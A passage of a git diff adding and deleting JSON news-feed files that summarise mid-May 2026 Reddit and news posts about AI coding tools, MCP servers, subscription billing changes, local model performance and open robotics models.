**What you get:** - **Stateless per message** — each task gets fresh context, just like `-p` - **No SDK credits** — interactive mode uses your subscription - **Autonomous** — watches inbox, processes messages, writes responses - **Cheap idle** — minimal token overhead while waiting for work…", - "category": "ai_tools" - }, - { - "title": "[N] LangChain Interrupt 2026 announcements [N]", - "url": "https://reddit.com/r/MachineLearning/comments/1td4v0a/n_langchain_interrupt_2026_announcements_n/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-14T17:20:27.000Z", - "summary": "LangChain just wrapped Day 1 of Interrupt 2026 and announced a few things worth knowing about: **SmithDB** — A purpose-built distributed database for agent observability. The problem they're solving: agent traces are getting too large and complex for general-purpose databases. SmithDB is built with Rust, Apache DataFusion, and Vortex, designed specifically for multimodal content and long-span tracing. They're reporting P50 latency of 92ms for loading trace trees and 400ms for full-text search, with up to 12x speedup over previous LangSmith performance. Architecture is object storage + small Postgres metadata store + stateless services, so it scales elastically and can be self-hosted. **Context Hub** — A centralized system for managing agent context (AGENTS.md files, skills, policies, memory) in LangSmith. The interesting part is they're working with MongoDB, Pinecone, Elastic, and Redis on an open standard for agent memory — covering episodic, semantic, and procedural memory with versioning and portability across frameworks. 
**Deep Agents v0.6** — New release includes ContextHubBackend integration, an installable code interpreter that gives agents a programmable workspace inside t…", - "category": "ai_research" - }, - { - "title": "A VERY lightweight open web-search tool for smaller local LLMs", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tczzga/a_very_lightweight_open_websearch_tool_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-05-14T14:32:02.000Z", - "summary": "Hey everyone, Been playing around with local agent setups lately, mostly Cline/Roo with smaller models, and web search kept annoying me. Not because it doesn’t work, but because it usually throws way too much random page text into the context. small models really don’t handle that gracefully lol. they start with a simple search and suddenly half the prompt is scraped garbage. So I built bad boy, TinySearch. It’s a small open-source MCP tool that does web search, crawls a few pages, chunks/retrieves/reranks the useful bits, and gives the agent a much smaller context blob instead of dumping full pages. Repo: [https://github.com/MarcellM01/TinySearch](https://github.com/MarcellM01/TinySearch) Uses DuckDuckGo, Crawl4AI, dense + BM25-style retrieval, reranking, MCP, and it can also run as a FastAPI server. On my setup (M4 Mac and old ahh lenovo thinkpad) it usually takes around 5–12 seconds end to end, depending on the query/machine Not trying to replace real search infra or anything. it’s more just a little local research layer for people building agents who don’t want to spin up a whole backend just to let the model look stuff up. 
Still rough in places, but it’s been useful enough fo…", - "category": "ai_models" - }, - { - "title": "Stable Diffusion WebUI Forge for AMD GPU", - "url": "https://reddit.com/r/StableDiffusion/comments/1tcyyb4/stable_diffusion_webui_forge_for_amd_gpu/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "product_launch", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-14T13:55:36.000Z", - "summary": "It was a f\\*cking chore that took almost 9 hours but i was able to FINALLLLLY MAKE IT !!!! I´ve reached it ! So... i am gonna share the files that made it possible. \"Proof pics\" \"[https://github.com/lllyasviel/stable-diffusion-webui-forge](https://github.com/lllyasviel/stable-diffusion-webui-forge)\" *The link should look like this* [\\>>> Click Here to Download One-Click Package (CUDA 12.1 + Pytorch 2.3.1) <<<](https://github.com/lllyasviel/stable-diffusion-webui-forge/releases/download/latest/webui_forge_cu121_torch231.7z) Once its done click on extract into a folder... There click on update.bat.... then from there find all the files \"down bellow in the picture\" see what the files are and then either download the google drive links or copy paste the text i wrote down on facebook link and delete the original. Then u gotta click thru the webui-user.bat , webui.bat and run.bat... I have no clue in what order though ... 
good luck xd https://preview.redd.it/pvx8zl18m31h1.png?width=1920&format=png&auto=webp&s=8d5f9e3ba9fd355f0f9fffff89cfae57f3bef293 [copy and paste it all into these files till u see these \\\\\"\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\\\\" in case u are copying i…", - "category": "creative_tools" - }, - { - "title": "Max20 user: anyone running Opus 4.7 as orchestrator + DeepSeek V4 as the worker via OpenRouter?", - "url": "https://reddit.com/r/ClaudeAI/comments/1tcvngy/max20_user_anyone_running_opus_47_as_orchestrator/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-14T11:43:58.000Z", - "summary": "I'm on the Max20 plan, thinking about a setup before I sink time into it. Want to hear from anyone actually running it, not theorycraft. **The idea:** Opus 4.7 in Claude Code as the orchestrator. It plans, breaks down tasks, reviews code quality, catches mistakes. The actual implementation, the bulk token spend, gets delegated to DeepSeek V4 Pro through OpenRouter. DeepSeek lands credibly close to Opus 4.7 on agentic coding benchmarks at a fraction of the output-token cost, so the bet is: keep Opus for the judgment-heavy parts, don't burn it on routine implementation. **I'm not expecting huge savings.** Realistically maybe an extra 30% (guessing here) effective Opus headroom if delegation works cleanly, and even less margin now that the limits situation has loosened a bit. So part of the question is genuinely whether 30% is worth the integration friction at all, or whether it's a fun idea that doesn't pay for itself. **Pre-empting the obvious responses, because I've already thought about these:** * *\"Just use Sonnet for the cheap parts.\"* The easy answer. 
But I'm specifically curious whether an external model's cost delta beats the friction, and whether anyone's actually measured…", - "category": "ai_tools" - }, - { - "title": "Automated AI researcher running locally with llama.cpp", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tcu5r8/automated_ai_researcher_running_locally_with/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-14T10:32:04.000Z", - "summary": "Hi everyone, I'm happy to share ml-intern, which is a harness for agents to have tighter integration with Hugging Face's open-source libraries (transformers, datasets, trl, etc) and Hub infrastructure: [https://github.com/huggingface/ml-intern](https://github.com/huggingface/ml-intern) The harness is quite simple (basically tools + system prompt) and we built it initially for Claude Opus. However, now that open models are getting really good at agentic workflows, I just added support for running ml-intern with local models via llama.cpp or ollama. As you can see in the video, Qwen3.6-35B-A3B is able to SFT a model end-to-end by orchestrating CPU/GPU sandboxes and jobs on the Hub. 
I find this pretty neat because we can now have an AI researcher running 24/7 on a laptop, without maxing out token limits :) Anyway, I hope this is useful to the community and please let me know if there are any features that you'd like us to include.", - "category": "ai_models" - }, - { - "title": "OpenAI's deployment company move says more about the AI gap than any benchmark[D]", - "url": "https://reddit.com/r/MachineLearning/comments/1tcsnng/openais_deployment_company_move_says_more_about/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-05-14T09:11:15.000Z", - "summary": "OpenAI launched a deployment company with $4B initial investment, 19 partner organizations, and acquired Tomoro (UK-based AI consultancy, \\~150 engineers). The pitch: embed \"Forward Deployed Engineers\" into enterprises to help them actually use AI. This is basically the Palantir playbook. Send engineers into complex organizations, build deep integrations, become infrastructure. But the reason OpenAI is doing this tells you something uncomfortable: the gap between \"model capability\" and \"production deployment\" is widening, not closing. Over a million enterprises have adopted OpenAI products. But adoption and deployment are different things. Enterprises can sign up for an API key without having any workflow that actually benefits from it. The model gets better every quarter but the integration work stays hard. Daybreak (their new security product) is interesting but feels like a separate conversation. The deployment company is the signal. When the leading model company decides it needs its own consulting arm, it's acknowledging that selling API access isn't enough. The last mile is still human-intensive, context-specific, and resistant to automation. 
For the ML community this should…", - "category": "ai_research" - }, - { - "title": "You're abusing your subscription with agentic 24/7 workflows and that's why we all get restrictions and limits", - "url": "https://reddit.com/r/ClaudeAI/comments/1tcpxi2/youre_abusing_your_subscription_with_agentic_247/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-14T06:38:26.000Z", - "summary": "Subscription tiers were designed around interactive human use, but autonomous loops changed the usage. It makes sense that companies separate autonomous work from subscriptions. You and I know that when these tiers with these prices were introduced, agentic workflows were nowhere near where they are now. The past half a year has introduced everything from OpenClaw to Ralph loops to multi-agent orchestration and long-running autonomous tasks. All build on the previous ones, making the autonomous work longer, and minimising the time we're interacting with the AI while maximising the output. Do everyday users (the people the lower tiers of these subscriptions are meant for) need automatically running autonomous agents in scales? Some do, but rarely. The same people that use services like Agent SDK likely do it for work or income, optimise for maximum token burn for their buck, and as a result that non-interactive usage ends up balancing the subscription token limits lower. This of course leads to Anthropic seeking solutions for the outliers that burn so much they affect the limits for the gauss middle of the subscriber base. 
Seeing people now publishing workarounds instead of going A…", - "category": "ai_tools" - }, - { - "title": "I tested GPT-5.5 Codex against Opus 4.7 Claude Code, and it's about time Anthropic bros take pricing seriously.", - "url": "https://reddit.com/r/ClaudeAI/comments/1tcpe8y/i_tested_gpt55_codex_against_opus_47_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-14T06:09:37.000Z", - "summary": "I've used Claude Code the most among AI coding agents. Sonnet, Opus, I've run them all. The reason is simple: they're beasts at tool execution and prompt following. That's also why Anthropic dominates API revenue from code agents. First-mover advantage is real, and developers love them. But GPT-5.5 Codex has been insanely good. When new models drop, I run real tests, not benchmarks. This time I built two tasks: Test 1: PR triage bot – GitHub MCP, scoring formula, Slack alerts, retries, strict TS, no \"any\". Test 2: Real-time code review UI – React, WebSockets, optimistic rollback, virtualized diff, WS reconnect. Same prompts. Same MCP (GitHub + Slack). Same machine. Here's what I found out: Claude Code (Opus 4.7): \\- Verified MCP before writing a line \\- Built 36 files in 12 minutes \\- Wrote its own WebSocket smoke test (3ms broadcast) \\- Zero errors first run \\- Total cost: \\~$2.50 Codex (GPT-5.5 via Cursor): \\- Failed Task 1 (GitHub MCP not reachable – Cursor environment issue, not model) \\- Task 2 shipped but needed a patch for infinite React loop \\- 28 files, more compact architecture \\- Total cost: \\~$2.04 (18% cheaper) Claude shipped cleaner. Codex needed a patch pass. 
For co…", - "category": "ai_tools" - }, - { - "title": "Last week in Generative Image & Video", - "url": "https://reddit.com/r/StableDiffusion/comments/1tcnpxj/last_week_in_generative_image_video/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-14T04:43:38.000Z", - "summary": "I curate a weekly multimodal AI roundup, here are the open-source image & video highlights from the last week: \\- CausalCine — Interactive autoregressive framework for multi-shot video narratives. Content-Aware Memory Routing retrieves historical KV entries by attention relevance instead of temporal proximity, solving motion stagnation and semantic drift in long-rollout generation. Distilled to a few-step generator for real-time use. https://reddit.com/link/1tcnpxj/video/tbryyz3s611h1/player [Paper](http://arxiv.org/abs/2605.12496v1) | [GitHub](https://github.com/yihao-meng/CausalCine) \\- SwiftI2V — Efficient 2K image-to-video generation. Low-res motion drafting followed by high-res refinement while preserving source image detail. https://reddit.com/link/1tcnpxj/video/8n6t3ust611h1/player [Paper](https://arxiv.org/abs/2605.06356) | [GitHub](https://github.com/hkust-longgroup/SwiftI2V) | [Project Page](https://hkust-longgroup.github.io/SwiftI2V/) \\- OmniGen2 — Unified image generation model handling text-to-image, editing, subject-driven generation, and visual conditions in one architecture. 
| [Paper](http://arxiv.org/abs/2605.07254v1) https://preview.redd.it/iimjl0d2711h1.png?…", - "category": "creative_tools" - }, - { - "title": "Fully Realtime Interaction Models", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tckrpt/fully_realtime_interaction_models/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-14T02:25:36.000Z", - "summary": "I know this model isn't open weights, and when it does drop it'll be over api, but I'm just posting to say the very MICROsecond that this drops you already know me and probably a bunch of other people are going to create an insane amount of distill data from the api. because at least to me the very idea of a model that has complete ability to act on it's own accord is fascinating. I'm referencing this: [https://thinkingmachines.ai/blog/interaction-models/](https://thinkingmachines.ai/blog/interaction-models/)", - "category": "ai_models" - }, - { - "title": "Open-source, self-updating wiki for your codebase", - "url": "https://reddit.com/r/ClaudeAI/comments/1tcjv9b/opensource_selfupdating_wiki_for_your_codebase/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-14T01:47:30.000Z", - "summary": "I got tired of re-explaining the same codebase context to coding agents. Stuff like: “we tried moving auth into middleware, but backed it out because it broke OAuth callbacks,” or “that weird retry logic exists because Stripe webhooks arrive out of order.” So I built Almanac. It gives your coding agent a self-updating wiki for the codebase. It updates from your repo, and conversations you havewith Claude Code/Codex. The wiki lives locally in your repo as markdown. You can read it yourself, but the main consumer is the agent. It’s free and open source. 
Currently only MacOS (would add a windows support if people find it useful) GitHub: [https://github.com/AlmanacCode/codealmanac](https://github.com/AlmanacCode/codealmanac) Curious how other people are handling project context for long-running AI coding work.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-15.json b/data/news-feed-2026-05-15.json deleted file mode 100644 index 4aa1f27..0000000 --- a/data/news-feed-2026-05-15.json +++ /dev/null @@ -1,259 +0,0 @@ -{ - "generated": "2026-06-05T00:44:40.183Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-15", - "article_count": 15, - "archived_story_count": 629, - "articles": [ - { - "title": "Got Claude Max from office for VS Code usage — what’s the best setup, workflow, and hidden tricks?", - "url": "https://reddit.com/r/ClaudeAI/comments/1te36bt/got_claude_max_from_office_for_vs_code_usage/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "tool_update" - ], - "matching_tags": [ - "api_update", - "mcp", - "tool_update" - ], - "importance": 1, - "date": "2026-05-15T17:30:17.000Z", - "summary": "Our office recently gave us access to Claude Max plan, mainly for using inside Visual Studio Code VS Code. I mostly work on web development, debugging, refactoring, API integration, SQL queries, and large codebase understanding. Right now I’m just using it like a normal chatbot, so I feel like I’m massively underusing it 😅 Wanted to know from experienced users: What’s your best VS Code setup with Claude? Any must-have extensions/tools/workflows? Best way to handle large repositories/context limits? How do you structure prompts for better code output? Any tricks for debugging, refactoring, architecture planning, or documentation generation? Is MCP worth setting up? If yes, what servers/tools are actually useful? Any productivity hacks most beginners don’t know? 
Would love to hear real-world workflows instead of generic AI tips.", - "category": "ai_tools" - }, - { - "title": "I built a free Google search MCP that actually works(searching, fetching, with PDF)", - "url": "https://reddit.com/r/ClaudeAI/comments/1tdw4us/i_built_a_free_google_search_mcp_that_actually/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-15T13:18:10.000Z", - "summary": "✅ Actually works (tested 6 free MCPs, all failed) ✅ Search + URL extract in one MCP (replaces the usual search MCP + fetch MCP combo) ✅ Academic PDFs auto-handled (arxiv / biorxiv / Nature / OpenReview / NeurIPS / JMLR / PMLR / Springer / PubMed→PMC) ✅ Tiered extraction: `mode: \"abstract\"` returns \\~1500 chars per result for cheap relevance triage before paying for full bodies ✅ Auto-bootstrap on first run (no manual `npm run bootstrap` step anymore) ✅ Auto CAPTCHA recovery (Chrome opens, human solves once, retries) ✅ No API key, no proxies, no solver **4 tools** * `search` SERP only * `search_parallel` N queries concurrently * `extract(url, mode?)` `full` / `abstract` / `metadata`. PDF detected via Content-Type, `%PDF` magic, `citation_pdf_url` meta, and per-domain rules * `search_extract(query, mode?)` defaults to `abstract`, so a 5-result survey costs \\~7.5k chars instead of 40k **Why abstract mode** The old `search_extract` always fetched full bodies great for one URL, wasteful when you just want to know which of 5 results is worth reading. Abstract mode pulls PDF page 1 or HTML meta description (\\~1500 chars), letting the agent triage relevance, then call `extract` with `mode…", - "category": "ai_tools" - }, - { - "title": "Claude for Healthcare launched in January — but medical imaging is the obvious gap. 
Anyone else noticing?", - "url": "https://reddit.com/r/ClaudeAI/comments/1te160m/claude_for_healthcare_launched_in_january_but/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 1, - "date": "2026-05-15T16:19:44.000Z", - "summary": "I’m a radiology resident in Istanbul, also building medical AI fine-tunes on the side (bone age estimation, fluoroscopy catheter orientation, a Turkish radiology report LLM). When Claude for Healthcare launched in January, I dug into the announcement. The architecture is impressive — CMS, ICD-10, PubMed connectors, HIPAA infrastructure, prior auth and chart review workflows. But it’s entirely text + workflow. Zero imaging. This is interesting because radiology is arguably where medical AI has the most mature, FDA-cleared products today. Yet Claude’s healthcare push doesn’t touch it. Two reads: 1. Strategic choice — Anthropic is betting on orchestration over vertical vision models. The expectation might be: Claude orchestrates, external vision specialists (MedGemma, proprietary models) get called as tools/MCP servers. 2. Genuine gap — imaging just isn’t on the roadmap yet. Either way, the imaging-as-MCP-server pattern feels underexplored. Anyone building in this direction? Especially curious if anyone’s exposed a fine-tuned medical vision model as an MCP server that Claude can call.", - "category": "ai_tools" - }, - { - "title": "Am I stupid for pivoting to Transparency with Agents over Memory after 6 months?", - "url": "https://reddit.com/r/ClaudeAI/comments/1tdxi6r/am_i_stupid_for_pivoting_to_transparency_with/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-15T14:09:53.000Z", - "summary": "built an open source memory layer for ai agents. 
thought the obvious feature people would care about was persistent memory across restarts and shared memory between agents. that was the whole pitch. few months of actual user data in. most of the api calls aren't about memory at all. they're hitting the audit trail (what did the agent do and when), the loop detector (catching when an agent is stuck doing the same thing 20 times in a row), and the per-agent performance dashboard (which agent is wasting tokens, which one keeps crashing, who's drifting off goal). basically people don't really care that their agent remembers stuff across restarts. they care that they can see what it did and pull the plug when it goes off the rails. so i'm wondering if i should just flip the pitch. lead with \"observability and accountability for ai agents\" instead of \"memory for ai agents\". memory is table stakes at this point and mem0/zep already dominate that framing. loop detection + audit trail + performance scoring per agent feels like open territory. am i stupid? or is this the obvious move i somehow missed for 3 months", - "category": "ai_tools" - }, - { - "title": "I gave Claude Code a microphone via MCP. Now it asks me questions before writing code.", - "url": "https://reddit.com/r/ClaudeAI/comments/1tdupsr/i_gave_claude_code_a_microphone_via_mcp_now_it/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-15T12:21:22.000Z", - "summary": "There are already a lot of dictation apps that let you skip typing when prompting Claude. You speak, they transcribe, and your prompt appears in the text box. But I wanted to try something different: what if Claude Code could ask for voice input by itself? So I gave Claude Code a microphone via MCP. Now Claude can ask a follow-up question when it needs more context, I answer by voice, and it continues the task with that context. 
It’s similar to those tool calls where Claude asks you to pick an option, but instead of choosing from a menu, you can just answer naturally by voice. I added this to my macOS dictation app, Spokenly. It runs a local MCP server, Claude connects to it, and Claude can call a tool to request voice input. Spokenly can also read Claude’s questions out loud with TTS, so it feels more like a real back-and-forth. It’s **completely free** with local models and your own API keys. Download: [https://spokenly.app/download](https://spokenly.app/download) If anyone tries it with Claude Code, I’d love to hear your feedback.", - "category": "ai_tools" - }, - { - "title": "Built a tool that publishes HTML artifacts securely behind company auth", - "url": "https://reddit.com/r/ClaudeAI/comments/1tdudtk/built_a_tool_that_publishes_html_artifacts/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-15T12:07:44.000Z", - "summary": "Hey! Built [display.dev](http://display.dev) with a friend to make sharing Claude-generated HTML artifacts secure and easy between teammembers. Basically, it lets agents publish artifacts, you get back a URL. Your teammates can access it via Google/Microsoft SSO or with one-time passwords, and collaborate with inline comments. Works in CLI, or via MCP or web app. It's first purpose is to help teams collaborate better, but it's also useful for people who just want to share their artifacts with the public (optional visibility setting), or consultants/freelancers who want to share their work with clients. For larger teams, there are neat features like audit logs and stats, too. Anyway, let me know what you think - there's a free tier, of course.", - "category": "ai_tools" - }, - { - "title": "Anthropic built the agentic features. 
Now they're billing them separately.", - "url": "https://reddit.com/r/ClaudeAI/comments/1tdjx4f/anthropic_built_the_agentic_features_now_theyre/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-15T03:08:21.000Z", - "summary": "Starting June 15, Claude subscribers get a separate monthly credit for Agent SDK and `claude -p` usage: $200/mo for Max 20x, $100 for Max 5x, $20 for Pro. Once you burn through it, programmatic usage stops unless you've opted into extra usage billing at API rates. Your interactive Claude Code and chat usage stays on the subscription pool, untouched. I spent the last day digging into the community reaction across Reddit, GitHub, HN, and tech press. Tracked roughly 120 distinct opinions. Here's what I found. **The sentiment split** - About 60% negative (credit is too small, feels like a value regression) - About 25% pragmatic (\"this was inevitable, the old model was broken\") - About 15% neutral to supportive (\"interactive use is untouched, this is fair\") Theo Browne (T3.gg) put it bluntly: anyone using T3 Code, Conductor, Zed, or `claude -p` in CI scripts had their effective usage cut by 25x. 
He said he now has to make the Claude Code experience on T3 Code \"significantly worse.\" Ben Hylak (co-founder of Raindrop.ai) responded: \"This is either really silly, or shows how bad of a spot Anthropic is in re: GPUs.\" Theo also said: \"Framing this as a free credit instead of a regression for…", - "category": "ai_tools" - }, - { - "title": "Adaptive Markdown", - "url": "https://reddit.com/r/ClaudeAI/comments/1tdg7yn/adaptive_markdown/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-15T00:23:24.000Z", - "summary": "I’ve been working on an open-source document format / viewer idea I’m calling Adaptive Markdown. The basic idea is: instead of a document being static text it's controlled by coding agents. You interact with the document more like a live workspace. This has different implications depending on what you are doing. I made a short video demo here: [https://youtu.be/H4MnFs8irm8](https://youtu.be/H4MnFs8irm8) The thing I’m most excited about is academic / technical reading. In a few years I don’t think people will just read papers passively. I think they’ll translate passages, ask questions, generate examples, explore alternate proofs, run code, attach notes, convert math to Lean when possible, and keep all of that inside the document instead of scattered across chats and notebooks. This is trivial to do inside a browser with coding agent that has access to JS, CSS etc. Some possible use cases I’m thinking about: \\-Turning articles and books into personalized learning objects \\- lecture notes with automatically maintained structure \\-documents with embedded code, tables, consoles, images, audio, or video \\-AI-generated alt text and descriptions Incorporate Adaptive Markdown into automat…", - "category": "ai_tools" - }, - { - "title": "Memory drift? Context bloat? 
A Claude Code skill I wrote to manage long-running memory libraries", - "url": "https://reddit.com/r/ClaudeAI/comments/1tdtmr6/memory_drift_context_bloat_a_claude_code_skill_i/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.99, - "date": "2026-05-15T11:34:28.000Z", - "summary": "I've been running Claude Code's auto-memory on the same project for about three months. Roughly a month in, the library started getting hard to use: the same lesson recorded under three different filenames, frontmatter missing on half the files, searching for \"that bug we fixed last month\" returned nothing useful. Every new session, Claude loaded more and more memory files, and the context window kept getting crowded with irrelevant entries. I wrote a skill that enforces a naming schema and a bash audit script that flags drift. Sharing in case it's useful. # What the skill does Claude Code's auto-memory (v2.1.59+) writes plain markdown to `~/.claude/projects/<slug>/memory/`. The files are yours to read, edit, and version. What it doesn't enforce is structure — naming, required fields, or a Why section on each lesson. * **Schema on top of auto-memory.** `<type>_<topic>.md` naming, required frontmatter (name / description / type), Why section on feedback entries. Auto-memory still writes; the skill makes Claude write to a spec. * **Phrase-triggered review.** \"Audit memory\" runs the script. 
\"Review session\" walks the recent session and surfaces what's worth keeping.…", - "category": "ai_tools" - }, - { - "title": "SailPoint Unveils Agentic Fabric for AI Agent Security", - "url": "https://aimagazine.com/news/sailpoint-unveils-agentic-fabric-for-ai-agent-security", - "source": "AI Magazine", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 0.7, - "date": "2026-05-15T18:00:34.440Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Open-weights vs. closed models: Nano Banana Pro was nerf'ed", - "url": "https://reddit.com/r/StableDiffusion/comments/1tecqkx/openweights_vs_closed_models_nano_banana_pro_was/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-15T23:27:46.000Z", - "summary": "Companies think that they can nerf the model and people won't notice. Here is exhibit 1: Nano Banana Pro has fallen far from the tree. In our independent evaluation, Nano Banana Pro's image generation capability as of recently is worse than FLUX.2 \\[dev\\] and far from GPT-Image 2 Low. Just a reminder that no weights, not your models. https://preview.redd.it/kqon8d0jyd1h1.png?width=2212&format=png&auto=webp&s=61f3ced9f3b8f6d497d482494117e18c514bb6f3 You can explore our full calibration test set at [https://tests.drawthings.ai/generate](https://tests.drawthings.ai/generate) and [https://tests.drawthings.ai/edit](https://tests.drawthings.ai/edit). We will release the score on our full private test set soon. # 1. Charts **Top: Nano Banana Pro** **Bottom: GPT-Image 2 Low** Prompt: >A pie chart showing browser market share: Chrome 65%, Safari 20%, Firefox 10%, Other 5%. Each section should be appropriately sized and labeled with the browser name and percentage. Nano Banana Pro no longer seems able to make a simple labeled chart reliably. 
https://preview.redd.it/q67mipl5yd1h1.png?width=1024&format=png&auto=webp&s=4e8d0024331dfd906cda3da5e3cc307b6aec1f9e https:/…", - "category": "creative_tools" - }, - { - "title": "AllenAI has been iterating on their MolmoAct2 models for robotics", - "url": "https://reddit.com/r/LocalLLaMA/comments/1te9unl/allenai_has_been_iterating_on_their_molmoact2/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-15T21:30:46.000Z", - "summary": "r/AllenAI is cooking with MolmoAct2, a 5B vision-language-action model for robot control. They keep releasing new fine-tunes on different kinds of robotics datasets, including (but not limited to, and they keep releasing new ones): * https://huggingface.co/allenai/MolmoAct2-LIBERO - general robotics tasks * https://huggingface.co/allenai/MolmoAct2-DROID - interactive robotics tasks * https://huggingface.co/allenai/MolmoAct2-BimanualYAM - absolute joint-pose control * https://huggingface.co/allenai/MolmoAct2-SO100_101 - also absolute joint-pose control AllenAI has released these as ***fully open source*** models, publishing not only their weights but also their **complete** training datasets (including pretraining), their training software source code, and technical papers describing the theory, training, and assessments of these models. 
If anyone is fiddling with robots controlled via LLM inference, you should give MolmoAct2 models a look.", - "category": "ai_models" - }, - { - "title": "Gemma4 26b MoE running in MLX with turboquant (and custom kernel)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1te6os6/gemma4_26b_moe_running_in_mlx_with_turboquant_and/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-15T19:34:12.000Z", - "summary": "TL;DR I spent a few crazy evenings this past week seeing if I could get Gemma4 running with proper turbo quant and rotating KV cache support. The answer was yes, and I'm now able to run Gemma4 26b on my MacBook Air M5 at 128k context with 4 concurrent batches 😄 At 8k context running with no mmap, it beats llama.cpp at prompt processing, generation speed, and runtime memory: |backend|model|bpw|pp tok/s|gen tok/s|runtime mem| |:-|:-|:-|:-|:-|:-| |llama.cpp|IQ4\\_XS + q4\\_0 KV + flash-attn|4.25|260.6|14.66|16.0 GB| |MLX (ours)|nvfp4 + polar2|4.5|348.4|17.15|15.22 GB| It took a lot of hand-tuning to get to this speed, including a custom kernel for the SWA layers in order to get the actual runtime 2bit memory savings that enable higher batch sizes whilst staying close to full fp16 prompt processing speed The prompt processing speed scales relatively well with batch size - the major gains though are in the text generation - running a 512 token-long prompt on a 32 GB M5: |B|pp tok/s|gen tok/s| |:-|:-|:-| |1|353|16.0| |4|429|24.9| |8|451|32.4| |16|451|44.2| |32|450|48.0| |64|448|54.6| |128|440|54.0| If you want to download it and serve it yourself, you can open a terminal to a directory y…", - "category": "ai_models" - }, - { - "title": "Notes from evaluating a customer support chat agent system: heuristic evaluators give false signal, retrieval bugs masquerade as LLM failures, and the cost/quality Pareto frontier is rarely where you think [D]", - "url": 
"https://reddit.com/r/MachineLearning/comments/1te38yg/notes_from_evaluating_a_customer_support_chat/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-15T17:32:50.000Z", - "summary": "Posting some practical findings from a structured audit of a production customer support RAG system. Methodology and caveats up front. **Methodology:** * 6 representative turns from a real production session as the eval set (small, acknowledged limitation) * LLM-as-judge using Claude Haiku 4.5, scoring relevance/accuracy/helpfulness/overall on 0-10, returning per-turn reasoning strings for verification * Same judge across all conditions, same questions, same retrieval state where possible * Production model held constant while isolating retrieval changes, then swept across 5 LLMs once retrieval was fixed * Live pricing from OpenRouter /models API rather than estimates **Findings:** 1. **Heuristic evaluation produces zero signal.** The existing evaluator counted keywords and source references. Output was numerical but uncorrelated with response quality. LLM judges with explicit rubrics caught hallucinations, identified zero-retrieval turns, and produced reasoning that could be spot-checked. The cost is real but small (cents per run) compared to shipping undetected regressions. 2. **Retrieval failures present as generation failures.** A turn where the agent said \"I don't have inform…", - "category": "ai_research" - }, - { - "title": "Beta testers wanted: MCP 